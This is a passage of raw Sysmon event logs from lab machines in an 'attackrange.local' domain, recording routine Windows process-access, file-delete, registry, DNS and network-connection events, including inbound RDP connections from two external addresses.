09:19:07.181{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052218Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.181{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052217Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.181{5EBD8912-79BF-6151-DB77-00000000FC01}23165256C:\Windows\system32\sihost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052216Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F40-614D-2E00-00000000FC01}24564772C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001052215Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052214Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F40-614D-2E00-00000000FC01}24564772C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26da2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001052213Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052212Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052211Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052210Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001052209Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.165{5EBD8912-7F2F-614D-0C00-00000000FC01}8286000C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001052437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:08.807{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\termination\surveyor-20210924073320-000MD5=13B075665B362AEBAA962867709D6032,SHA256=F5617938160195F3C9D1D3B39A265732908A85CDCFD490A7902131616AB6230D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:08.772{5EBD8912-7F40-614D-2B00-00000000FC01}30082168C:\Windows\system32\DFSRs.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+ae6e|C:\Windows\system32\wbem\wmidcprv.dll+b6aa|C:\Windows\system32\DFSRs.exe+c85a|C:\Windows\system32\DFSRs.exe+6c92|C:\Windows\system32\DFSRs.exe+7424|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:08.772{5EBD8912-7F40-614D-2B00-00000000FC01}30082168C:\Windows\system32\DFSRs.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+ae6e|C:\Windows\system32\wbem\wmidcprv.dll+b6aa|C:\Windows\system32\DFSRs.exe+c797|C:\Windows\system32\DFSRs.exe+6c92|C:\Windows\system32\DFSRs.exe+7424|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:08.772{5EBD8912-7F40-614D-2B00-00000000FC01}30083656C:\Windows\system32\DFSRs.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmidcprv.dll+163a4|C:\Windows\system32\wbem\wmidcprv.dll+166e0|C:\Windows\system32\wbem\wmidcprv.dll+ae6e|C:\Windows\system32\wbem\wmidcprv.dll+b6aa|C:\Windows\system32\wmidcom.dll+542c|C:\Windows\system32\wmidcom.dll+5495|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.472{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-429.attackrange.local138netbios-dgm 354300x80000000000000001052432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.472{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-429.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 354300x80000000000000001052431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:06.524{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59842-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 13241300x80000000000000001052430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\NextInstanceDWORD (0x00000014) 13241300x80000000000000001052429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\CountDWORD (0x00000014) 12241200x80000000000000001052428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\xenfilt\Enum\20 13241300x80000000000000001052427Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000001052426Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-SetValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\CountDWORD (0x00000001) 12241200x80000000000000001052425Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-DeleteValue2021-09-27 09:19:08.163{5EBD8912-7F11-614D-0100-00000000FC01}4SystemHKLM\System\CurrentControlSet\Services\umbus\Enum\1 23542300x8000000000000000980303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:08.046{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F4952C05F50300078B88AA5BAB3CAE3,SHA256=FFBB55ED63651A8B510C6F464F952FDBCACC21F29336FF422DD65F17130120E1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001052442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.813{5EBD8912-7F40-614D-2A00-00000000FC01}3000win-dc-429.attackrange.local0fe80::65e5:9cae:dd2b:361b;::ffff:10.0.1.14;C:\Windows\System32\ismserv.exe 23542300x80000000000000001052441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:09.070{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\splunk\conf-mutator.pidMD5=29908E1B7B7BE7D28A64FCEC4E1C6614,SHA256=B66CB6C0AEC74654285D6D7081BCF82B62133A8C4E2D39AC01C4B0C7168BD78C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.504{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53489-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001052439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.504{5EBD8912-7F40-614D-2A00-00000000FC01}3000C:\Windows\System32\ismserv.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53489-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001052438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:07.502{5EBD8912-7F40-614D-2A00-00000000FC01}3000C:\Windows\System32\ismserv.exeNT AUTHORITY\SYSTEMudptruefalse127.0.0.1-63950-false127.0.0.1-63950- 23542300x8000000000000000980304Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:09.061{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB9B056C742D80367D58EADF882EF01C,SHA256=3A14A52C9A76390C0DACA71ED5503577623AA37C127195BAF1D1516F6BE1252F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980306Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:07.856{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59471-false10.0.1.12-8000- 23542300x8000000000000000980305Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:10.061{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5DD8E8D3695937D54F688D035D7819F4,SHA256=4607808E6A2FF3FF6F58925394A1701E3A57AC752EB40F0DABB2C3D3621EFE07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980309Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:08.320{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-59744-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980308Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:11.155{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D47D313F4E403AC3E9437B830CFE8748,SHA256=7F6EB2E4C2649C65FFF6B993955A7B22612326B0AE54CF2CE3470526D5B486FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980307Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:11.155{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B66C4FE38B152AEEA71D42505CC3D28,SHA256=95CBFD419673CC3ED3D04D01BE232E5AA2DDF5A841709080CD1F28D64EC44B9B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980310Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:12.389{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 